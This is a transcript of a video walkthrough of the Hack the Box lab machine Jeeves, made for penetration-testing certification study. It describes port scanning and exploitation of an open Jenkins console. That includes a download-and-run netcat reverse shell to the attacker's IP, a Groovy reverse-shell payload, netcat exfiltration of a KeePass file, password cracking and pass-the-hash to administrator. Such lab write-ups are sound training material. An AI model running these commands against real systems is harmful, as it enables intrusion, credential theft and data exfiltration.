We're going to break into Jeeves, a machine from Hack the Box. I'll walk you through every step so you can replicate this on your own, from initial recon all the way to the root flag. Let's get started. Jeeves is a medium difficulty Windows machine that exposes a Jenkins server through the web. We can use that Jenkins server to execute commands and get an initial shell. Once we're on the box, we recover a KeePass database and crack it to obtain credentials. With those credentials, we perform a pass-a-hash attack to gain administrator access. The root flag is then stored in an alternate data stream, which we extract at the end. If you're working towards the CPTS certification, Hack the Box has an official CPTS preparation track, and this machine, Jeeves, is a part of it. I'm currently going through the entire track and recording every box as I go, and you'll find all these walkthroughs in my CPTS playlist. So if you're studying for the exam too, follow along and work through the machines with me. Before we get into the hands-on technical demonstration, let me quickly introduce myself for those who are new to the channel. Hello, my name is Kyser Clark. I have been a cybersecurity professional for over 7 years now, and I currently work as a full-time penetration tester, also known as an ethical hacker. This stuff isn't theory. This is what I do in the real world every single day, and I'm here to help you grow your hacking and cybersecurity knowledge. This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. Alright, so we're going to be playing Jeeves in guided mode because I believe guided mode makes these walkthroughs much more beginner friendly. So task number 1, how many TCP ports are listening on Jeeves? Click the hint and it says scan the host with nmap. For the initial scan, we're going to do an nmap, and then we're going to do a -S, capital S for a SYN scan, also known as a stealth scan, and then a -T4 to speed it up a little bit, and then we're going to do a -P- to scan all ports, and then we're going to paste the target IP address to scan the target IP. And after 962 seconds, we have our results, and as you see here, we have port 80, port 135, port 445, and port 50,000 open. So if you count these, 1, 2, 3, and 4. So 4 is the answer for task number 1. Moving on to task number 2. What is the relative path on the web server on port 50,000 to an open source automation server? Path starting with slash, such as /home. Let's click the hint here. Brute force a web server with something like GoBuster or FurroxBuster. Try the directory list -2.3 -medium.txt file from seclist. So as I said, we can use GoBuster or FurroxBuster. You can even use FFUF or DirbBuster or Dirb. There's tons of tools out here that will brute force directories on a web server. I personally like to use FurroxBuster. It's not installed on Kali Linux by default, but to install it, all you have to do is just run it like that, and then it's going to ask you to install. Unable to locate package, so I need to do a apt update, and now I can hit FurroxBuster, hit Y to install, and hit Y again. You do need to be root to do this, so if you're not running as a root user, make sure you put sudo in front of that command. And after we get FurroxBuster installed, we can now run it, and the full command is going to look like this. This looks like a lot, but I'll break it down. So we got FurroxBuster, that's the tool, -S URL, this is the URL we are targeting. It's http:// and then the IP address of your target, :50,000, because that's where we want to target. We want to target this port specifically, so it's important that you do the :50,000. -W, which stands for word list, and the word list told us to use is a directory list 2.3 -medium. But in order to get there, you have to go through /user /share /wordlist /seclist /discovery /web content /directory list 2.3 medium.txt. And then I throw in a -C, which means it's going to cancel out these errors. So I don't like to see any 400 errors, and I don't like to see any 500 errors. So that's why you see, 401, 404, 403, 405. I actually got 404 in there twice, but it doesn't matter. It will work, and it's going to not show us any 400 or 500 errors. And then -K, which is the / option here, this will ignore any certificates. So if it has any more certificate issues, it's just going to ignore that, and it's going to run pretty well for us. And after some time, we will find some discoveries. And as you can see here, we find /Jeeves. We see a lot of /Jeeves in here. And that is the directory that we are looking for this task. Back over on our Hack the Box dashboard for task 2, we can paste in here /Jeeves and hit submit. And that is correct. Moving on to task number 3. What is the title of the drop-down menu that offers commands such as execute Windows batch command in this version of Jenkins? Hit the hint here. Create a new freestyle project and set up the build environment. Back over on our Kali Linux attack box, I'm going to open up a browser window here in Firefox. We'll go full screen here, and we're going to go to http:// and then we want to paste in our target IP address, and we want to do a :50,000, and then we want to do a /Jeeves. Push enter on this. And once we get to the Jenkins dashboard here, you might notice that we are actually already an administrator. It doesn't say that we're logged in, but we can manage Jenkins, we can do builds. Basically, we have administrator access here. So what it's asking us here is we need to figure out how to execute Windows batch commands. And to do that, we need to do new item. And we will enter the item name. We'll just call this Jenkins. And we're going to do a freestyle project. And we're going to hit OK. And once we create the project, we can actually ignore all the stuff that's going on here. All we need to do is click on build. And under the build section, we can see add build step. This is the drop down menu it's talking about. And you can see right here, the first option is execute Windows batch command, which falls under add build step. And add build step is the answer for task number 3. Back on our Hack the Box dashboard, all we need to do is type in add build step and hit submit, and that is the correct answer. Task number 4, what user is a Jenkins application running as on Jeeves? Click the hint here. Add a Windows batch command to execute a reverse shell. This can be done with NC or with a PowerShell one-liner. And for those who don't know, NC is actually short for netcat, and that is the route we're going to take here because I was having troubles with the PowerShell one-liner. So let's go ahead and use the netcat. To do this, we're going to open up a new tab here, and we are going to navigate to https://eternallybored.org/miss/netcat. Push enter on this, and you can read about it, but we just need to click right here to download netcat 1.11. And you can see it's already downloaded. So I'm just going to click this folder icon here. And I want to click right click. And I'm going to extract here. And then all I'm going to do is I'm actually going to take this folder and I want to move it to my root directory because I don't like it being in downloads. Alright, so I'm going to go ahead and close out of this and go back to my terminal. And if we do an ls here, we will see we have netcat-1.11 as a directory. So let's just change directory into that netcat directory. If we do an ls here, we can see netcat.exe is here. We actually have netcat 64 and the 32-bit version. We're going to be using the 32-bit version. Now our goal is to get netcat.exe onto Jeeves. In order to do that, we need to serve netcat.exe on a web server. To do that, we're going to do a python 3-m http.server, and I like to host on port 80. What this is doing is it's hosting every file in the current directory, so the netcat-1.11 directory, which is all these files on a web server. So once again, all these files right here that I've highlighted are being served on a web server. And the reason why we're doing this is because when we're serving these files, this gives the ability for other computers to download our files. And this is how we're going to transfer netcat.exe over to Jeeves. And we are also going to start a netcat listener, and we're going to wait for the incoming connection from Jeeves. So to do that, we actually need to open up a new tab. So I'm going to right click and I'm going to split the view here. And this is all weird. So let me just zoom back in here. And I'm going to zoom in on here so you can see better. And to set up a netcat listener, it's very simple. What I do is do a nc-lmvp, and I like to listen on port 443. Push enter on this, and now our netcat is waiting for incoming connections. So to recap with what we got going on here, we have two terminals. On this terminal, we are hosting netcat.exe, and Jeeves will make a connection to our HTTP server and download netcat.exe. After it downloads netcat.exe, it's going to run netcat.exe, and when it runs netcat.exe, it's going to connect back to us on this terminal window. That's what this netcat listener is for. It's waiting for the incoming connection from Jeeves, and this is how we're going to get our shell. So let's go back to Firefox. Let's go back to our Jenkins configuration, and under build, we're going to do add build step, execute Windows bash command, and we are going to paste in the command that we need to download netcat.exe from our Kali Linux box. The command looks like this: PowerShell wget, and then the URL in this case is http://10.10.15.140. That is my hack the box IP address. For you, it's going to be different. And then we're going to do /netcat.exe, and we're going to put it in an out file, and we're going to call it netcat.exe. So this command right here is the command that is going to make Jeeves download netcat.exe. And then the next command, which is actually executing netcat.exe, is going to connect back to our Kali Linux netcat listener. So that command looks like this: nc.exe, just calling the program, -e for execute. It's going to execute cmd.exe. That's what's going to get our shell. And then once again, our IP address. So this is going to be your hack the box IP address, and then whatever port you are listening on. In my case, is 443. So once again, this is a command that downloads netcat.exe, and this is a command that's going to run netcat.exe. Now we're going to hit save, and then we're going to hit build now. Going back to our window here, and as you can see, you just saw it over here. We have a successful status 200, which downloaded netcat.exe, and then over here in this window, you can see we have a successful connection to Jeeves. And if we do a who am I, we are Jeeves kohsuke. Sorry if I butchered that, but we have a shell and we can now celebrate. So back over on our Hack the Box dashboard, for task number 4, it's telling us username without the domain. So all we have to do is paste in the username kohsuke and hit submit. Once again, I'm probably saying that wrong, but it is what it is. And that is correct. So the next task here is submit user flag. By the way, I already have it done because I pwned this box about 9 months ago, just in case you were wondering. But let's go ahead and get that user flag. I'll show you how to do that right now. So we're back on our Kali Linux attack box, and we can actually close out of this left window. We don't need to serve this file anymore, so I'm going to hit Control-C to close out of this. And then it's going to type in exit, and it's going to make our terminal weird again. But if we just do a Control-Shift and then plus a couple of times, we can get the sizing correct. And all we have to do now is type c://user/kohsuke/desktop/user.txt, push enter on this, and we get the user flag. So you would copy this and then paste it in your Hack the Box dashboard. If you're getting value out of this video so far, if you're learning something new, if it helped you get past the part you were stuck, do me a favor, hit the like button and subscribe for more hacking and cybersecurity content. All right, so now I want to show you an alternate way to get a reverse shell on a Jenkins machine. So I'm actually going to exit this, clear the terminal, and we're actually going to run another netcat listener, but we're going to do a different kind of reverse shell in a different way. And I actually think this way is easier. And the reason why I didn't show you this way first is because the first way I showed you was actually the intended way. This way may or may not have been intended, but I think it's important for you to show this because this is the way I actually did it, because this is the way I found when I was researching ways to exploit Jenkins. And what we're going to do here is we're actually going to click on Manage Jenkins, and then we're going to scroll down to the script console. And here we can run Groovy scripts. So it says right here, type in an arbitrary Groovy script and execute it on the server. And that's really all we need to know. So if we come up here and we go to revshells.com and we change this IP address to our IP address. So in my case, it's 10.10.15.140, and we change the port to 443 because that's what we're listening on. We're going to change the OS to Windows, and we're going to scroll down until we see Groovy. Right there it is. So click on Groovy, and this is the command right here that's going to get us a reverse shell through this method. So we're just going to scroll down. Actually, before we copy this, we need to change the shell to CMD. We don't need to apply any encoding. We can just hit copy here. And once again, we have no connection on our Netcat listener. Come back over to Firefox, come back to our Jenkins, and we're just going to paste that Groovy script command right here. And we're going to click on run. And then we're going to go back to our terminal, and boom, look at that. We have another shell. That way is a lot easier. Back on our Hack the Box dashboard, going into task number 6. What is the full path to the KeePass database on Jeeves? Click on the hint, enumerate kohsuke's home directory. Alright, so back to our initial access shell that we just got through the Groovy script. We can actually do a change directory c:/users. And if we do a dir, we can see all the users. Here's kohsuke. So all I have to do is change directory kohsuke. And then if we do a dir, we can see all kinds of directories. And if we go into documents, and if we do a dir, we can see a CEH.kdbx. That is the KeePass database file. So if you see a .kdbx, that is a KeePass database. So back over on our Hack the Box dashboard, you can see right here, I already submitted this previously, but the full path is c:/users/documents/ceh.kdbx. Moving on to task number 7. What is the master password to the CEH.kdbx file? Click on the hint here. Use KeePass2John to create a hash and then crack it with John or Hashcat. So back over on our shell as kohsuke on Jeeves, we actually need to transfer CEH.kdbx to our Kali Linux attack box. And in order to do that, we need to open up a new tab or a new session here on our terminal. So I'm going to right click, going to split the view left to right again. We will zoom in so we can actually read that, and we will zoom in on this one as well. And we're going to transfer the file via netcat. And the command is very simple. So over here on our Kali Linux attack box, we just want to run netcat-lp and then whatever port you want. I'm doing 443, and we're going to put the output into a file called Jeeves.kdbx. We're going to push enter on this, and all it's doing here is netcat is waiting for a connection, and once it receives a connection, it's going to take the data it receives and put it in a file called Jeeves.kdbx. And then over here on the Jeeves side, we actually need to either specify the full file path to netcat.exe, or we need to move netcat.exe over to this directory. I think it's a little easier if we just do a move, and then we'll specify the full file path to netcat.exe. That is c:/users/administrators/.jenkins/workspace/jenkins/netcat.exe. And the reason why netcat.exe is here is that's where we got our initial shell from when we did the first reverse shell method through the build. So we're just going to move that to here. So the dot is the current directory. And I actually forgot mv isn't a command in Windows. So I'm going to do a copy, and we're just going to run that same command like so. And if we do a dir, we can see netcat.exe. Now we can run netcat.exe to send our CEH.kdbx over to our Linux attack box. So let's paste this here, and netcat.exe -w3, and then this is our Linux attack box IP address, and we are listening on port 443, and we are putting CEH.kdbx into this program. And if we run this, it's going to send information over here. So push enter here on the left and wait for that to transfer. And after a moment or two, we see that this right here and this right here has freed up our terminal. And if we do an ls over here, we can see that we have Jeeves.kdbx. Now we need to convert Jeeves.kdbx into a crackable hash, because we can actually crack the password hash of the KeePass database file. In order to do that, we are going to use a command called KeePass to John. This is just going to take the KeePass file and convert it into a crackable hash that we can crack with John the Ripper. And then we just specify Jeeves.kdbx, and then we're going to output that in a new file called Jeeves.hash. And it works very fast. If we do an ls, we now have Jeeves.hash that's ready and crackable. We're actually going to use RockU instead of the default John the Ripper word list. So in order to use RockU, we first need to unzip it. So I'm actually going to open up our file directory here, and I'm just going to navigate into /user/share/wordlist, and I'm just going to right click on RockU, and I'm going to hit extract here. And after that gets extracted, and now we're just going to run john -- wordlist equals, and then the full file path to rocku.txt, and then Jeeves.hash, and push enter on this. And after a little bit of time, we will crack the hash, and we will see that we have a password, moonshine1. So definitely copy this, put it in your notes, and you're going to want to paste it for task number 7. As you can see here, the correct answer is moonshine1. Moving on to task number 8, what user's NTLM hash is stored in the KeePass database? Click on the hint for this one. It's under the name backup stuff. So in order to open up the .kdbx database file, we need to install a program that will run KeePass. So the program we're going to be using is KeePass XC, and it's not installed in the Kali Linux by default. So I'm just going to run an app install KeePass XC, push enter on this, and then push Y to confirm, and it will install KeePass XC for us. And then after that gets installed, we can call the program by doing KeePass XC and then specifying our Jeeves.kdbx. Push enter on this, and we'll be able to access the database. We have the password. It is moonshine1, and hit unlock. And then now that we're in here, we have a ton of information. But what we're ultimately looking for is in the backup stuff. If we click into here, it says username ? But you can see there are other ones in here. So if we hit administrator, we can actually get the administrator hash like that. So definitely copy this and put it in your notes. Back over on our Hack the Box dashboard, the username without the domain is administrator. Paste that, submit, and that is correct. And then the final task here, submit the root flag located on the administrator user's desktop. So back over on our Kali Linux attack box, we can now log in as an administrator using a patch to hash technique. And the technique we're going to use is PTH-win exe. PTH stands for pass the hash. and then we're going to do the -u option, which stands for username, and then we're going to specify the domain, which in this case is Jeeves, / and then the username, which is administrator, and then %, and then the full hash that we got from the KeePass database, and then we're going to do // and then this is going to be our target IP address. This is Jeeves IP address, and then we're going to do a CMD, which is going to give us a CMD command prompt. Instantly, you can see we are G/administrator. Now we can do a change directory c:/users/administrator/desktop, and if we do a dir, we don't see a root.txt. We do see an hm.txt. So let's see what's in there. Type hm.txt, and the flag is elsewhere. Look deeper. So the flag is actually in hm.txt, but it's in an alternate data stream. And in order to see that alternate data stream, we need to do a dir/R. We push enter on this. We can see that hm.txt has a file within it called root.txt. And in order to read the context of root.txt, which is housed within hm.txt, we need to do a PowerShell get content -path. We're specifying hm.txt and then -stream and then root.txt. Push enter on this, and we will get the root flag. So copy this and paste it on your Hack the Box dashboard. As you can see, I have already pasted this because, like I said earlier, I put in this machine about 9 months ago, and I'm just going to hit share results to get the most satisfying sound in the world to show up. And just like that, Jeeves has been pwned. If this was helpful and you're studying for the CPTS certification, keep going with the next machine in the playlist. I built it so you can follow step by step and build your confidence along the way. Click the playlist now, and I'll meet you in the next walkthrough.